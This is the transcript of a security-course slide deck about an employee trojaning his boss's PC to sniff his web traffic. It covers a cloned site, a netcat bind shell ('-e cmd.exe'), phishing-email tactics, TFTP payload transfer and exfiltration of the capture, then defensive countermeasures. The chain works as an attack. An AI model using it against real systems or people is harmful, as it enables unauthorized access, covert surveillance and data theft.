Presentation is loading. Please wait.

Presentation is loading. Please wait.

What’s the Boss viewing?.  The Boss established a new policy against surfing the web during work hours  Phoenix decides to examine the sites that the.

Published byKristin Butler Modified over 8 years ago

Similar presentations

Presentation on theme: "What’s the Boss viewing?.  The Boss established a new policy against surfing the web during work hours  Phoenix decides to examine the sites that the."— Presentation transcript:

1 What’s the Boss viewing?

2  The Boss established a new policy against surfing the web during work hours  Phoenix decides to examine the sites that the Boss is looking at by spying on him

3  The networked machines are connected via a switch ◦ Private 192.168.1.0 network  Boss’ IP:192.168.1.5  Phoenix’s IP:192.168.1.6

4  Monitor traffic to and from the Boss’ machine  How “loud” should this approach be? ◦ Loud/noisy means that could trigger alarms of IDS/IPS systems  Might be reasons to launch a noisy attack  Provide a distraction to another attack  Sometimes it’s the only way to monitor traffic  Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done

5  “Loud” methods ◦ Gratuitous ARP for individual hosts  ARP Poisoning ◦ MAC spoofing ◦ MAC flooding ◦ SPAN  Port mirroring

6  Gratuitous ARP ◦ Unsolicited ARP  Protocol allows for it, without checking for the ARP request (stateless!)  ARP reply sent out associating the target’s IP with the collector’s MAC address  Spoof the MAC of the gateway ◦ Collector replies to ARP requests for the gateway’s MAC ◦ Switch will see the router’s MAC address on both switch ports will send outbound traffic to both ports  MAC flooding ◦ Overwhelm the switch’s MAC table  Causes the switch to “failover” into hub mode  MACOF (http://monkey.org/~dugsong/dsniff/)

7  Capture the traffic on the target host itself ◦ Plant WinPCap and Trojan Horse on the host  The trick will be to install the software on the target host ◦ Boss will not blindly install software  Have to convince him it’s something of value to him  The plan consists of a chained series of exploits

8  Copy a web site and host it on Phoenix’s server  Bind Netcat to a legitimate executable file  Send email to boss ◦ Download the free executable  Netcat will also be downloaded and installed  Connect to boss’ machine using Netcat  Use TFTP and download a WinDump program onto boss’ machine  Capture the boss’ network traffic  Analyze captured traffic  Rebuild a jpg image using a hex editor

9  Phoenix locates a site and plans to get his boss to visit a copied version of the site ◦ Lays the groundwork via some social engineering  Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer ◦ Uses a utility to download and mirror the site  Wget (www.gnu.org/software/wget)www.gnu.org/software/wget  Copy the site recursively to hard drive, with appropriate level of hyperlinks of the 1 st page  Will also copy the practice test executable  Phoenix will bind his Trojan to this executable

10  Trojan wrapper program is used ◦ YAB (Yet Another Binder)  Areyoufearless.com (no longer there, however can get via BitTorrent sites)  Altavista.net  Packetstormsecurity.org  Add Bind File option  Allows Phoenix to bind nc.exe  Will execute nc (asynchronously is possible)  Can add execution parameters when nc starts up  Np 50 –e cmd.exe –L  Registry startup option available (default is no)  Melt stub option  Will remove netcat after execution  Icon can be added to make the install appear legitimate

11  Overwrite the original ccna.exe file with the bound Trojan file in the phony site  Register a very similar domain name ◦ “certification - practice.com”  Send an email to victim ◦ Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site  www.mail.com www.mail.com  Doesn’t require a “real” email address to register  Victim would have to read the email message headers in order to see the real source domain

12  Check for spelling and grammatical errors  Offer something free or trial basis  Appeal to greed ◦ Why victim is getting something for nothing  Lower suspicion  Appeal to victim’s sense of self ◦ Self-help tools, adding to success, etc  Brevity  Text of the email contains the link to the site ◦ Appears as the URL of the real site, but the hyperlink is really the phony site  Present the email to the victim ◦ Possibly prepare the victim for the email, adding to the enticement

13  Angry IP Scanner ◦ www.angryziber.com/ipscan/ www.angryziber.com/ipscan/  Scan IP’s on the network for the IP with port 50 open and listening

14  nc to the victim’s machine on port 50  Verify the connection using ipconfig ◦ Will show the victim machine’s IP in the nc window

15  Use command line utility ◦ nc does not allow for usage of a GUI (Windows) interface  Sysinternals has a TFTP server available ◦ Free ◦ No configuration required ◦ Windows already has a TFTP client!  Windump is downloaded ◦ www.winpcap.org/windump www.winpcap.org/windump ◦ Placed into the default TFTP server directory (TFPT-Root)  Phoenix sets up a TFTP server on his machine  Using Netcat, Phoenix types tftp –i 192.168.1.6 get windump.exe windump.exe tftp [-i] host [put | get] source destination -i switchuse binary transfer

16  Options ◦ -ccount (packets) ◦ -ssnaplength (length of packets captured) ◦ -wfilename (of captured packets) windump –c 500 –s 1500 –w capture.log  If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine ◦ Windump requires winpcap

17  Phoenix downloads winpcap  Unzips it  TFTP (to victim’s winpcap directory) ◦ Daemon_mgm.exe ◦ NetMonInstaller.exe ◦ Npf_mgm.exe ◦ Rpcapd.exe ◦ Uninstall exe  Execute Npf_mgm.exe –r Daemon_mgm.exe –r NetMonInstaller.exe i

18  Using Netcat tftp –I put 192.168.1.6 capture.log  Use a packet analyzer to view the traffic ◦ Wireshark  A review show sites visited by the victim ◦ Includes a GET (HTTP) for a file called “gambling.jpg”  Follow TCP stream ◦ Capture the output as raw data ◦ Use a hex editor (WinHex), if required, to edit the raw data  Remove everything before the actual binary file (HTTP commands, etc)  Leaves just the actual binary of the image  Jpg starts with ÿØÿà

19

20  Anonymous note left on the victim’s desk highlighting the activity  Internet usage policy relaxed the next day

21  Phishing ◦ Training! ◦ Spam filters / phishing filters  Trojan horse ◦ Anti-virus software  Latest signatures ◦ However  Organizations will alter the Trojan (for a price) so that it does not match a signature  EliteC0ders (no longer offers this “service”) ◦ Software policy ◦ Sniffing  Port security on switches  Protects against ARP poisoning, MAC spoofing and MAC flooding  IPS  PromiScan  Host based IDS  Cisco Secure Agent  Warns if new application is launching

Download ppt "What’s the Boss viewing?.  The Boss established a new policy against surfing the web during work hours  Phoenix decides to examine the sites that the."

Similar presentations

Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
Man in the Middle Attack

Man in the Middle Attack
© 2006 Cisco Systems, Inc. All rights reserved.Cisco ConfidentialPresentation_ID 1 Common Layer 2 Attacks and Countermeasures.

© 2006 Cisco Systems, Inc. All rights reserved.Cisco ConfidentialPresentation_ID 1 Common Layer 2 Attacks and Countermeasures.
CISCO NETWORKING ACADEMY Chabot College ELEC 99.05 Address Resolution Protocol.

CISCO NETWORKING ACADEMY Chabot College ELEC Address Resolution Protocol.
Sniffing, Spoofing, Hijacking This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added.

Sniffing, Spoofing, Hijacking This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
SYSTEM ADMINISTRATION Chapter 19

SYSTEM ADMINISTRATION Chapter 19
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
Phishing (pronounced “fishing”) is the process of sending e-mail messages to lure Internet users into revealing personal information such as credit card.

Phishing (pronounced “fishing”) is the process of sending messages to lure Internet users into revealing personal information such as credit card.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 3 Internet Security.
Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.

Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.
Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.

Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
COEN 252: Computer Forensics Router Investigation.

COEN 252: Computer Forensics Router Investigation.
Click to edit Master subtitle style Chapter 17: Troubleshooting Tools Instructor:

Click to edit Master subtitle style Chapter 17: Troubleshooting Tools Instructor:
Introduction to InfoSec – Recitation 12 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 12 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Understanding Networks Charles Zangla. Network Models Before I can explain how connections are made from across the country, I would like to provide you.

Understanding Networks Charles Zangla. Network Models Before I can explain how connections are made from across the country, I would like to provide you.

Similar presentations

Ads by Google